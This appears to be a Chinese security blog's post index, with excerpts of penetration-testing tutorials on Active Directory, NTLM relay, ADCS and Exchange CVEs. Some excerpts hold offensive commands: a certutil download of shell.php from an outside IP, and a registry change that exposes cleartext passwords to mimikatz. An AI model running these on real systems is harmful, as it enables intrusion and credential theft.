- 博客(648)
- 资源 (20)
- 收藏
- 关注
原创 Kerberos票据转换
由于mimikatz,kekeo,Rubeus生成的凭据是以.kirbi后缀的,而impacket生成的凭据是.ccache后缀的。所以在某些场景下需要使两种票据互相转换,可以使用以下两种工具。
2022-09-13 09:58:14 1772
原创 使用ADExplorer导出域内信息
在域渗透的过程中,往往需要导出域信息进行分析。本文演示通过ADExplorer导出域内信息本地解析后导入BloodHound,来进行域内信息的分析。
2022-09-13 09:55:42 2555
原创 导出域内信息
当在域渗透的过程中,如果只获得了一个有效的普通域用户,可以有很多工具很多方式连接LDAP进行查询信息,比如:adfind、adexplorer、ldapsearch等等。 但是如何将活动目录中指定的信息导出到本地离线进行查看呢?本文讲解通过csvde和LDAPDomainDump两种方式导出活动目录中指定的信息到本地进行本地离线查看。
2022-09-13 09:49:46 1431
原创 mitm6的使用
mitm6是一个渗透测试工具,它利用Windows的默认配置来接管默认的DNS服务器。它通过回复DHCPv6消息,向受害者提供一个链接-本地IPv6地址,并将攻击者的主机设置为默认的DNS服务器来做到这一点。作为DNS服务器,mitm6将有选择地应答攻击者选择的DNS查询,并将受害者流量重定向到攻击者的机器,而不是合法的服务器。Mitm6被设计为与WPAD一起工作,用于WPAD欺骗和证书中继。
2022-09-05 09:58:15 788
原创 Responder的使用
Responder是一个LLMNR,NBT-NS和MDNS投毒者,它将回答特定的NBT-NS(NetBIOS名称服务)查询。
2022-09-05 09:54:42 1436
原创 使用bloodyAD对域属性进行查询与修改
bloodyAD是一款功能强大的域内信息查询、修改、权限提升的工具。该框架支持NTLM和Kerberos身份验证,并绑定到域控制器的LDAP/LDAPS/SAMR服务,以获得AD信息。
2022-09-05 09:36:44 890
原创 深入分析CVE-2022-26923 ADCS权限提升漏洞
目录漏洞背景和描述基础知识ADCS服务搭建&LDAPS配置PKI公钥基础设施CA证书颁发机构PKINIT Kerberos认证证书模板用户模板计算机模板证书注册漏洞原理用户模板实验一实验二实验三实验四实验五实验六实验七原理总结计算机模板实验一实验二实验三实验四实验五原理总结漏洞复现定位证书服务器域内域外创建机器用户请求证书认证获得域控hash导出域内任意用户哈希
2022-05-26 17:43:34 3112 4
原创 Mac安装多个Java环境
原本Mac电脑就已经安装了1.8.0_311的java,现在有需求还需要安装Java 11。下载地址:https://download.csdn.net/download/u010025294/12863527下载后安装,安装完成后。再次查看 /Library/Java/JavaVirtualMachines目录。如下图所示,可以看到多了jdk-11.0.8.jdkcd /Library/Java/JavaVirtualMachinesls -lh然后需要修改.zshrc配置文件了。首先
2022-01-28 18:28:28 5451 1
原创 利用PetitPotam进行NTLM Relay攻击
2021年7月19日,法国安全研究人员Gilles Lionel披露了一种新型的NTLM Relay攻击利用手法——PetitPotam。该漏洞利用了微软加密文件系统远程协议(MS-EFSRPC,MicroSoftEncrypting File System Remote Protocol)。MS-EFSRPC是 Microsoft 的加密文件系统远程协议,用于对远程存储和通过网络访问的加密数据执行“维护和管理操作”。利用该漏洞,黑客通过连接到LSARPC强制触发目标机器向指定远程服务器发送Net-NTL.
2021-09-18 15:45:58 6234
原创 RemotePotato0域内权限提升漏洞
RemotePotato是Antonio Cocomazzi和Andrea Pierini发现的一种域内攻击技术,它允许攻击者将域用户权限提升到Enterprise Admin组内,此技术执行跨协议中继以实现NTLM Relay攻击,并将提升的NTLM身份验证流量中继到域控制器以实现权限提升。利用前提条件:具有域管理员特权的用户已经登录到受害者主机或通过远程桌面登录 攻击者已获得对受害者主机的初始访问权限,或者已通过WinRM或SSH访问(拥有本地管理员权限的账号,可以是本地administrat
2021-09-18 14:48:48 3441
原创 ADCS证书服务攻击
ADCS支持几种基于HTTP的通过管理员可以安装的其他AD CS服务器角色功能。这些基于http的证书注册接口都是易受攻击的NTLM中继攻击,因为没有启用NTLM中继保护,而且Authorization HTTP 标头明确只允许通过 NTLM 身份验证,因此更安全的协议(如 Kerberos)无法使用。http://10.211.55.4/certsrv/certfnsh.asp漏洞复现定位证书服务器机器certutil -config - -pingntlmrela
2021-08-06 16:17:30 4519
原创 利用MS-SAMR协议修改/还原用户密码
在实战中,我们经常会碰到这么一种场景。拿到域控的权限了,把域内所有用户哈希都导出来了。为了找靶标,需要登录指定用户的机器或其他web系统,但是指定用户的hash未能解除明文密码,而RDP和web又不支持hash登录,这时,渗透陷入了困境。有的朋友可能会说,既然都有域控的权限了,那可以把指定用户的密码修改为我们已知的密码再利用,但是这种方法不可行,第一是演习规则中禁止修改用户密码,第二是用户如果发现自己的密码被修改了的话,就肯定知道被入侵了,立马会进行溯源,会打草惊蛇。针对这种情况,我们有以下两种解决方案
2021-08-06 16:08:07 3655
原创 CVE-2021-26855 Exchange SSRF漏洞
目录漏洞说明漏洞影响版本漏洞复现漏洞说明Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。2021年03月3日,微软官方发布了Microsoft Exchange安全更新,披露了多个高危严重漏洞,其中:在 CVE-2021-26855 Exchange SSRF漏洞中,攻击者可直接构造恶意请求,以Exchange server的身份发起任意HTTP请求,扫描内网,并且可获取Exchange用户信息。该漏洞利用无需身份认证。漏洞影响版...
2021-07-23 14:36:30 6108
原创 CVE-2020-17144 Exchange RCE漏洞
目录漏洞背景漏洞影响版本漏洞复现exp1exp2漏洞修复漏洞背景在微软最新发布的12月安全更新中公布了一个存在于 Microsoft Exchange Server 2010中的远程代码执行漏洞(CVE-2020-17144),官方定级 Important。该漏洞是由程序未正确校验cmdlet参数引起,经过身份验证的攻击者利用该漏洞可实现远程代码执行。该漏洞和 CVE-2020-0688 类似,也需要登录后才能利用,不过在利用时无需明文密码,只要具备 NTHash 即可。除了
2021-07-23 14:19:32 3888 1
原创 CVE-2020-16875 Exchange RCE漏洞
漏洞背景2020年09月08日微软发布漏洞通告:CVE-2020-16875 | Microsoft Exchange Server 远程执行代码漏洞由于对cmdlet参数的验证不正确,Microsoft Exchange服务器中存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以在系统用户的上下文中运行任意代码。利用该漏洞,攻击者可从特定 Exchange 用户提升到操作系统 SYSTEM 权限,攻击者首先需获得特定权限的邮箱用户(拥有Data Loss Prevention角色权限的用户),该用
2021-07-23 14:17:18 6980
原创 Exchange邮箱服务器后利用
当我们拿到了Exchange邮箱服务器权限后,我们可以进行进一步的利用。比如导出所有用户的邮件等等。使用PSSession连接Exchange服务器管理邮件首先使用PSSession连接Exchange服务器#使用PSSession连接Exchange服务器$User = "xie\administrator"$Pass = ConvertTo-SecureString -AsPlainText P@ssword1234 -Force$Credential = New-Object ..
2021-07-05 17:40:01 3531
原创 Exchange SSRF 域内提权漏洞复现(CVE-2018-8581)
漏洞描述 Exchange Server于2018年11月份被爆出存在SSRF漏洞,可以伪造任意用户。但在之后又被爆出另外一种攻击方式,可以使用任意域内用户通过NTML Relay来接管域控!攻击者仅需要拥有一个普通域内用户权限即可对存在漏洞的Exchange服务器发起攻击,进而接管域控。漏洞影响版本Exchange 2010 ~ Exchange 2016漏洞过程Exchange允许任何用户为推送订阅指定所需的URL,服务器将尝试向这个URL发送通知。问题出在Excha...
2021-07-01 09:45:38 4013 1
原创 Windows Print Spooler权限提升漏洞(PrintNightmare)
目录一:漏洞概述二:影响范围三:漏洞利用四:漏洞防护4.1 官方升级4.2 临时防护措施一:漏洞概述6月9日,绿盟科技CERT监测到微软发布6月安全更新补丁,修复了50个安全漏洞,其中包括一个WindowsPrintSpooler权限提升漏洞(CVE-2021-1675),此漏洞为绿盟科技天机实验室向微软报告并获得官方致谢。Print Spooler是Windows系统中用于管理打印相关事务的服务,虽然微软在公告中将该漏洞标记为Important级别的本地权限提升漏洞..
2021-06-29 15:15:09 3854
转载 Linux中tmux的使用
目录Tmux会话操作新建会话退出会话查看会话列表进入会话销毁会话重命名会话窗口操作新建窗口切换窗口关闭窗口窗格垂直分屏水平分屏切换窗格关闭窗格Tmux我们在linux服务器上的工作一般都是通过一个远程的终端连接软件连接到远端系统进行操作,例如使用xshell或者SecureCRT工具通过ssh进行远程连接。在使用过程中,如果要做比较耗时的操作,例如有时候进行编译,或者下载大文件需要比较长的时间,一般情况下是下班之后直接运行希望第..
2021-06-28 16:27:27 3466
原创 OSS Browser的使用
目录AK登录授权码登录管理Bucket存储桶ossbrowser是阿里云官方提供的OSS图形化管理工具,提供类似Windows资源管理器的功能。OSS Browser官方版支持 AK(AccessKey)登录 和 临时授权码 登录两种模式。AK登录使用AK登录ossbrowser,您可以使用AK(比如子账号AK)登录使用ossbrowser。不推荐使用主账号AK登录。登录RAM控制台创建子账号,子帐号的权限分为:大权限子账号(即拥有所有Bucket权限,且...
2021-06-28 15:36:14 5024
原创 你所不知道的NTLM Relay
目录NTLM Relay捕获Net-NTLM HashNBNS&LLMNR打印机漏洞图标Outlook系统命令officepdfWPADXSSXXE&SSRF重放Net-NTLM HashRelay To SMBRelay To EWSRelay To LDAPNTLM Relay的防御NTLM RelayNTLM Relay其实严格意义上并不能叫NTLM Relay,而是应该叫 Net-NTLM Relay。它是发
2021-06-28 11:58:38 3547
转载 python中加密库crypto报错的解决方法
我们在一些脚本中经常会遇到python的加密库:crypto,安装运行的时候经常会报错。现在让我们来看看crypto加密库的一些区别:crypto:一个加密解密的库 pycrypto:crypto在python上面的名字是pycrypto它是一个第三方库,但是已经停止更新三年了,所以不建议安装这个库 pycrytodome:是pycrypto替代品,且可以兼容之前的pycrypto,与pycrypto不能同时安装 pycryptodomex:此版本为新版解密加密库可以执行如下命令:pip ins
2021-05-20 15:55:14 6514 1
原创 利用Account Operators组实现接管域控或权限提升
在域渗透的过程中,我们往往只会关注Domain admins组和Enterprise Admins组,而会忽略了其它组。今天,我们要讲的是Account Operators组。该组是内置的本地域组。该组的成员可以创建和管理该域中的用户和组并为其设置权限,也可以在本地登录域控制器。但是,不能更改属于Administrators或Domain Admins组的账号,也不能更改这些组。在默认情况下,该组中没有成员。也就是说,该组默认是域内管理用户和组的特殊权限组。在实际环境中,某些企业会有专门的管理用户账
2021-04-29 19:05:22 3481
原创 为Microsoft Active Directory服务器启用基于SSL的LDAP(LDAPS)
使用OpenSSL,创建新的私钥和根证书。执行如下命令,将生成文件 ca.key 和 ca.crtopenssl genrsa -aes256 -out ca.key 4096openssl req -new -x509 -days 3650 -key ca.key -out ca.crt参考文章:https://gist.github.com/magnetikonline/0ccdabfec58eb1929c997d22e7341e45...
2021-04-22 15:05:35 2997
原创 Guest用户如何切换到administrator用户桌面
先以guest用户RDP登录,管理员权限打开 regeditHKEY_LOCAL_MACHINE——>SAM——>SAM——>权限HKEY_LOCAL_MACHINE——>SAM——>SAM——>Domains——>Account——>Users——>000001F4 ,名称F ——>修改二进制数据(B)右键全选,然后复制然后查看HKEY_LOCAL_MACHINE——>SAM——>SAM——&g
2021-04-20 21:53:13 9641
原创 使用Hash远程RDP登录
我们知道在Windows Server2012及其以后的版本中,使用mimikatz在内存中抓取不到明文密码了,这是微软为了防止内存中泄露明文密码做的一个安全措施。但是修改注册表后重启依然可以抓取到明文密码,执行如下命令,等待目标机器重启后使用mimikatz即可抓取到明文密码reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d
2021-04-20 21:23:45 4351
原创 certutil工具的用法
certutilcertutil也是windows下一款下载文件的工具,自从WindowsServer 2003就自带。但是在Server 2003使用会有问题。也就是说,以下命令是在Win7及其以后的机器使用。远程下载certutil -urlcache -split -f http://114.118.80.138/shell.php #下载文件到当前目录下 certutil -urlcache -split -f http://114.118.80.138/shell.php c
2021-03-23 00:37:08 7551 3
原创 CVE-2021-26858/CVE-2021-27065 Exchange 任意文件写入结合Write Dcsync Acl打域控
查询域内具备Dcsync权限的用户,可以看到已经有xie\hack了hack用户拥有dcsync权限后,即可导出域内任意用户哈希,导出administrator用户的哈希,远程连接域控。
2021-03-14 20:43:59 5178 3
原创 Mac安装Hexo博客
首先安装node.js和Gitbrew install node.jsbrew install git#查看安装的版本node -vgit --version然后安装hexonpm install -g hexo-cli创建博客目录,初始化mkdir blogcd bloghexo init启动hexo s...
2021-03-09 20:19:58 2153
原创 Exchange Server writeACL Dcsync导出域哈希
所有的Exchange Server 默认都在Exchange Windows Permissions组里面而,这个组默认对域有WriteACL权限。所以当我们拿下Exchange服务器的时候,就可以尝试使用WriteACL赋予自身Dcsync的权限.使用powerview,为当前exchange机器名用户增加dcsync权限(此处需要使用dev分枝中的powerview)powershell.exe -execbypass -Command"& {Import-Module .powe..
2021-03-08 09:51:42 2723 7
原创 域用户锁定策略
默认情况下,域用户是不锁定的,即密码错误次数再多也不锁定。net accounts /domain我们可以手动修改Default Domain Policy组策略来更改账号锁定策略。然后使用密码喷洒工具进行喷洒五次测试,再用该账号进行登录尝试,可以看到显示当前用户被锁定。在域控这边可以看到hack用户已经被锁定了...
2021-03-02 13:37:32 3977
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人